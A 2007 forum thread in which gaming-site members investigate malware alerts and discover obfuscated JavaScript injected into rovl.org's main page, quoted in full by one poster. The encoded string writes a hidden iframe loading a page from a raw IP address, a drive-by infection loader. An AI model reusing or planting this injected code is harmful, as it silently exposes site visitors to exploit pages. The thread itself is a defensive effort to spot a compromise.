Security Issue - Read Please!

Started by Shadow, August 26, 2007, 06:44:59 PM

Previous topic - Next topic

0 Members and 3 Guests are viewing this topic.

Shadow

well im pretty careful of my browsing anyways... I'd be very surprised to find anything other than the occasional tracking cookie on my machine
<=holbs-.. ..-holbs=> <=holbs-..

windhound

#16
eh, if you keep your box uptodate with a decent antivirus and firewall you're generally fine
but, you dont have to browse to the bad sites to get infected
http://it.slashdot.org/article.pl?sid=04/05/17/0640235  older slashdot artical: an unprotected, unpatched windows box on an open networks is vulnerable to attacks. 
You dont have to go to them, they come to you = P

OneCare got slammed too
http://news.bbc.co.uk/2/hi/technology/6331959.stm
http://news.bbc.co.uk/2/hi/technology/6418965.stm

If you're going to use windows keep it safe, more zombie boxes are bad for all of us.  Thats why AVG, Avast, and other antivirus programs offer a free version and ZoneAlarm is a free firewall for home users. 
Windows Firewall got pitiful reviews as well, but its much better than nothing  (SELinux Firewall ftw!)

last note, a hardware router (linksys, dlink, etc) is an excellent first line of defence, if they see somthin' coming in they werent expecting it generally gets thrown away.  if you open ports or DMZ then that removes said protection, but thats what software firewalls are for

edit, disclaimer
...I'm just typing this 'cause its the first full week of school and I've got some downtime between classes, just spewing some general info and ideas with the idea that a small precentage of it may be useful to someone = P 
A Goldfish has an attention span of 3 seconds...  so do I
~ In the beginning there was nothing, which exploded ~
There are only 10 types of people in the world: Those who understand binary, and those who don't

Shadow

I have a linksys router, and I run online scans from Norton every now and again to cover some of OneCare's holes

it's worked well so far
<=holbs-.. ..-holbs=> <=holbs-..

Gen. Volkov

I've got pretty comprehensive protection myself.. I've never noticed viruses from rovl though.
It is said that when Rincewind dies the occult ability of the entire human race will go up by a fraction. -Terry Pratchett

cloud says: I'm pretty sure I'm immune to everything that I can be immune to...brb snorting anthrax.

Sticker334 says(Peace Alliance): OMG! HOBOES

Shadow

run an online scan or something - "trojandownloader" and "exploit" running around your pc sounds pretty ugly to me
<=holbs-.. ..-holbs=> <=holbs-..

Gen. Volkov

I mean, my McAfee catches those things pretty easily, and I run scans on a weekly basis, I've noticed nothing strange when I log on to the forums or the game. I don't use the rovl portal though.
It is said that when Rincewind dies the occult ability of the entire human race will go up by a fraction. -Terry Pratchett

cloud says: I'm pretty sure I'm immune to everything that I can be immune to...brb snorting anthrax.

Sticker334 says(Peace Alliance): OMG! HOBOES

Shadow

the login page is fine, only rovl causes me problems
<=holbs-.. ..-holbs=> <=holbs-..

bjornredtail

#22
Quote
function v46d4d1ff29476(v46d4d1ff29c45){
    function v46d4d1ff2a414 () {
         return 16;
    }
     return(parseInt(v46d4d1ff29c45,v46d4d1ff2a414()));
}
function v46d4d1ff2b3b9(v46d4d1ff2bb83){
     function v46d4d1ff2d324 () {
          var v46d4d1ff2dac6=2;
          return v46d4d1ff2dac6;
    }
    var v46d4d1ff2c353='';
    for(v46d4d1ff2cb24=0; v46d4d1ff2cb24<v46d4d1ff2bb83.length; v46d4d1ff2cb24+=v46d4d1ff2d324()){
         v46d4d1ff2c353+=(String.fromCharCode(v46d4d1ff29476(v46d4d1ff2bb83.substr(v46d4d1ff2cb24, 46d4d1ff2d324()))));
     }
return v46d4d1ff2c353;
} document.write(v46d4d1ff2b3b9('3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E777269746528273C696672616D65206E616D653D316139633132207372633D5C27687474703A2F2F35382E36352E3233352E3135332F7E706F7A69746976652F6963652F696E6465782E7068703F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A3830343433292B27386432666361373133315C272077696474683D373831206865696768743D313033207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F696672616D653E27293C2F5343524950543E'));
Just imagen that just without the whitespace to make it somewhat readable. That funky bit of code appears on the rovl.org main page. I think this is the source of our problems.
0==={=B=J=O=R=N=R=E=D=T=A=I=L==>
AKA, Nevadacow
First person to ever play RWL

"Program testing can be used to show the presence of bugs, but never to show their absence!"-Edsger W. Dijkstra

Visit http://frostnflame.org today!

Shadow

i have no idea what it means - enlighten me
<=holbs-.. ..-holbs=> <=holbs-..

wolf bite

The ROVL main page does go to some site to get random explanations of the 4 different sites.  Maybe you are picking that up?


Wolf Bite
********************
Grand Master Wolf Bite
********************
Wolf Pack =  Klowd19, Blood Wake, Sonoras, Giggles

windhound

O_o  well would you lookit that

naw wolf, /maybe/ the php script goes around and fetches descriptions, but I doubt it.  it would be wasteful and much easier to just put it in.  anyways, if it was fetching that bit shouldnt be viewable.  go to http://rovl.org and view source (with firefox just right click / view page source), its a little over halfway down, just after the body tag and its contained within [script] tags

I havent any idea what that does, assuming it does anything, but its almost certainly unnessisary.
A Goldfish has an attention span of 3 seconds...  so do I
~ In the beginning there was nothing, which exploded ~
There are only 10 types of people in the world: Those who understand binary, and those who don't

bjornredtail

If that were the case, why the seemingly random function names? Why the fancy encodeing of the stuff to be printed? Why the complete lack of any formating or documentation? I belive it is intentionally set up to be confuseing, diffacult to track down and malicious. Addationally, the random thing I belive is done serverside. The client never sees any of that code.

I'll take a closer look at the code later, using the powers of VIM.
0==={=B=J=O=R=N=R=E=D=T=A=I=L==>
AKA, Nevadacow
First person to ever play RWL

"Program testing can be used to show the presence of bugs, but never to show their absence!"-Edsger W. Dijkstra

Visit http://frostnflame.org today!

Shadow

retto owns rovl does he not? why would he put malicious code there?
<=holbs-.. ..-holbs=> <=holbs-..

windhound

ever heard the term 'compromised'?
well, this is an example. 
server got itself hack'd
A Goldfish has an attention span of 3 seconds...  so do I
~ In the beginning there was nothing, which exploded ~
There are only 10 types of people in the world: Those who understand binary, and those who don't

Shadow

#29
aha... well ima put it on restricted sites so i dont forget again? :-P

edit: nvm that blocks forums too ^_^
<=holbs-.. ..-holbs=> <=holbs-..